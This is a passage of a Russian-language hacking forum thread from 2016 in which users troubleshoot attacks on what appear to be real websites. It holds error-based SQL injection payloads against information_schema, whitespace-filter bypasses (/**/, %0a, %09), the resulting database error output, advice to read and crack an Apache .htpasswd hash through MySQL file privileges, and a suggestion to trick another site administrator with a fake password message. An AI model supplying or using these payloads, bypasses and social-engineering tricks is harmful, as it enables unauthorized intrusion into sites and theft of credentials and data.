HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1291  
Старый 29.08.2016, 18:11
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

засоциалить другого админа. мы так похекали булку пару лет назад. было весело)
напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить.
Подскажи мне с Error based плиз=) выше на 3 сообщения...
 
Ответить с цитированием

  #1292  
Старый 29.08.2016, 18:18
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от R3hab  
R3hab said:

то есть пароль от форума и админки могут отличатся?
не от самой админки, а от бейсик авторизации. юзай СИ.

Цитата:
Сообщение от [URL='/members/288914/'  
[URL='/members/288914/' said:
NonBlizz[/URL]]Подскажи мне с Error based плиз=) выше на 3 сообщения...
http://site.ru/info/1'or extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1
 
Ответить с цитированием

  #1293  
Старый 29.08.2016, 18:20
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

не от самой админки, а от бейсик авторизации. юзай СИ.
этот пароль в бд не хранится?
 
Ответить с цитированием

  #1294  
Старый 29.08.2016, 18:22
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от R3hab  
R3hab said:

этот пароль в бд не хранится?
нет, обычно хранится в файле .htpasswd (если там апач). если есть права на чтение файлов (file_priv=y) в MySQL то попробуй прочитать .htpasswd и расшифровать хэш. Там обычно хэш в формате md5(APR) или Des(Unix)
 
Ответить с цитированием

  #1295  
Старый 29.08.2016, 18:45
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

не от самой админки, а от бейсик авторизации. юзай СИ.
http://site.ru/info/1'or
extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1
Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:

Код:
Code:
http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)))='1
Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((
 
Ответить с цитированием

  #1296  
Старый 29.08.2016, 18:57
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от NonBlizz  
NonBlizz said:

Блин братух чё то не фига)) там походу стоит фильтрация всех типов пробелов или как, короче вот смотри:
Код:
Code:
http://ppt.ru/info/1'or%20extractvalue(1,concat(0x3a,(select%20table_name%20from%20information_schema.tables%20limit%200,1)))='1
Не раз уже с такой проблемой сталкиваюсь, и вот как вывести список таблиц((
вместо пробелов можно юзать одно из этих.

/**/, %0d, %0a, %0c, %09

вариантов куча.
 
Ответить с цитированием

  #1297  
Старый 29.08.2016, 19:04
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча.
Пробую и не помогает чё то..... в чём дело не пойму..
 
Ответить с цитированием

  #1298  
Старый 29.08.2016, 19:07
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:

вместо пробелов можно юзать одно из этих.
/**/, %0d, %0a, %0c, %09
вариантов куча.
Вот пример:

Код:
Code:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1
Код ошибки:

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1
 
Ответить с цитированием

  #1299  
Старый 29.08.2016, 20:22
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от NonBlizz  
NonBlizz said:

Вот пример:
Код:
Code:
http://ppt.ru/info/1'or%0aextractvalue(1,concat(0x3a,(select%0atable_name%0afrom%0ainformation_schema.tables%0alimit%0a0,1)))='1
Код ошибки:
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%0aextractvalue(1,concat(0x3a,(select%0atable_nam e%0afrom%0ainformation_schema.t' at line 1
судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
 
Ответить с цитированием

  #1300  
Старый 29.08.2016, 22:15
NonBlizz
Guest
Сообщений: n/a
Провел на форуме:
4644

Репутация: 0
По умолчанию

Цитата:
Сообщение от t0ma5  
t0ma5 said:

судя по ошибке дело в том что данные попадают напрямую в запрос, без урлэнкода, в принципе ты можешь попробовать просто написать пробел вместо %20, ну или использовать аналог пробела /**/
Заместо пробелов ставил этот символ /**/

Код:
Code:
http://ppt.ru/info/1'or/**/extractvalue(1,concat(0x3a,(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)))='1
Результат:

Просто редирект на главную страницу:

http://ppt.ru/ без ошибок и т.д
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ